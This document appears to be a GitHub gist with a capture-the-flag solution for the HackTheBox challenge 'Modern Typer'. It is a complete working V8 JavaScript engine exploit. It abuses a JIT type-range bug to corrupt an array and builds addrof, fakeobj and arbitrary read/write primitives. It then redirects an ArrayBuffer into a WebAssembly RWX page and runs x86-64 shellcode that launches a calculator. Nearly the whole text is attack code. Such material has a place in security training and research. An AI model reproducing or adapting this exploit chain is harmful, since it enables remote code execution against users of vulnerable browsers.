Last active
July 21, 2023 14:41
-
-
Save KaoRz/ea14b978f81221f4951cc8d6e5fba33a to your computer and use it in GitHub Desktop.
Modern Typer - HackTheBox
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var buf = new ArrayBuffer(8); | |
| var f64_buf = new Float64Array(buf); | |
| var u64_buf = new Uint32Array(buf); | |
| function ftoi(val, size) { | |
| f64_buf[0] = val; | |
| if(size == 32) { | |
| return BigInt(u64_buf[0]); | |
| } else if(size == 64) { | |
| return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); | |
| } | |
| } | |
| function itof(val, size) { | |
| if(size == 32) { | |
| u64_buf[0] = Number(val & 0xffffffffn); | |
| } else if(size == 64) { | |
| u64_buf[0] = Number(val & 0xffffffffn); | |
| u64_buf[1] = Number(val >> 32n); | |
| } | |
| return f64_buf[0]; | |
| } | |
| function trigger(cond) { | |
| let x = NaN; | |
| if(cond) | |
| x = -Infinity; | |
| var value = Math.abs(x); | |
| value = Math.max(value, 0x100); // [0x100, inf] | |
| value = -value; // [-inf, -0x100] | |
| value = Math.max(value, -0x101); // [-0x101, -0x100] | |
| value = -value; // [0x100, 0x101] | |
| value -= 0x100; // [0x2, 0x3] | |
| value >>= 1; // NaN >> 1 = 0 | |
| value += 10; | |
| var array = Array(value); | |
| array[0] = 1.1; | |
| return [array, 1337]; | |
| } | |
| for(let i = 0; i <= 10000; i++) { | |
| trigger(true); | |
| } | |
| var aux_obj = {"a": 1} | |
| var corr_array = trigger(false)[0]; | |
| var aux_obj_arr = [aux_obj]; | |
| var aux_float_arr = [1.1, 2.2, 3.3]; | |
| var obj_arr_map = ftoi(corr_array[0x0f], 64) >> 32n; | |
| var flt_arr_map = ftoi(corr_array[0x18], 32); | |
| console.log("[+] Object array map: 0x" + obj_arr_map.toString(16)); | |
| console.log("[+] Float array map: 0x" + flt_arr_map.toString(16)); | |
| function addrof(obj) { | |
| aux_obj_arr[0] = obj; | |
| corr_array[0x0f] = itof(flt_arr_map << 32n, 64); | |
| let addr = aux_obj_arr[0]; | |
| corr_array[0x0f] = itof(obj_arr_map << 32n, 64); | |
| return ftoi(addr, 64); | |
| } | |
| function fakeobj(addr) { | |
| let backup = ftoi(corr_array[0x18], 64); | |
| let tmp_mem = (backup & 0xffffffff00000000n) + obj_arr_map; | |
| aux_float_arr[0] = itof(addr, 64); | |
| corr_array[0x18] = itof(tmp_mem, 64); | |
| let fake = aux_float_arr[0]; | |
| corr_array[0x18] = itof(backup, 64); | |
| return fake; | |
| } | |
| var rw_helper = [itof(flt_arr_map, 64), 1.1, 2.2, 3.3]; | |
| var rw_helper_addr = addrof(rw_helper) & 0xffffffffn; | |
| console.log("[+] Controlled RW helper address: 0x" + rw_helper_addr.toString(16)); | |
| function arb_read(addr) { | |
| let fake = fakeobj(rw_helper_addr + 0x20n); | |
| rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64); | |
| return ftoi(fake[0], 64); | |
| } | |
| function arb_write(addr, value) { | |
| let fake = fakeobj(rw_helper_addr + 0x20n); | |
| rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64); | |
| fake[0] = itof(value, 64); | |
| } | |
| var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3, | |
| 130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131, | |
| 128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128, | |
| 128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0, | |
| 0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]); | |
| var wasm_module = new WebAssembly.Module(wasmCode); | |
| var wasm_instance = new WebAssembly.Instance(wasm_module); | |
| var pwn = wasm_instance.exports.main; | |
| var wasm_instance_addr = addrof(wasm_instance) & 0xffffffffn; | |
| var rwx = arb_read(wasm_instance_addr + 0x68n); | |
| console.log("[+] Wasm instance address: 0x" + wasm_instance_addr.toString(16)); | |
| console.log("[+] RWX section address: 0x" + rwx.toString(16)); | |
| var arr_buf = new ArrayBuffer(0x100); | |
| var dataview = new DataView(arr_buf); | |
| var arr_buf_addr = addrof(arr_buf) & 0xffffffffn;; | |
| var back_store_addr = arb_read(arr_buf_addr + 0x14n); | |
| console.log("[+] ArrayBuffer address: 0x" + arr_buf_addr.toString(16)); | |
| console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16)); | |
| arb_write(arr_buf_addr + 0x14n, rwx); | |
| var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72, | |
| 0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848, | |
| 0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00]; | |
| for (let i = 0; i < shellcode.length; i++) { | |
| dataview.setUint32(4 * i, shellcode[i], true); | |
| } | |
| console.log("[+] Spawning a calculator..."); | |
| pwn(); | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment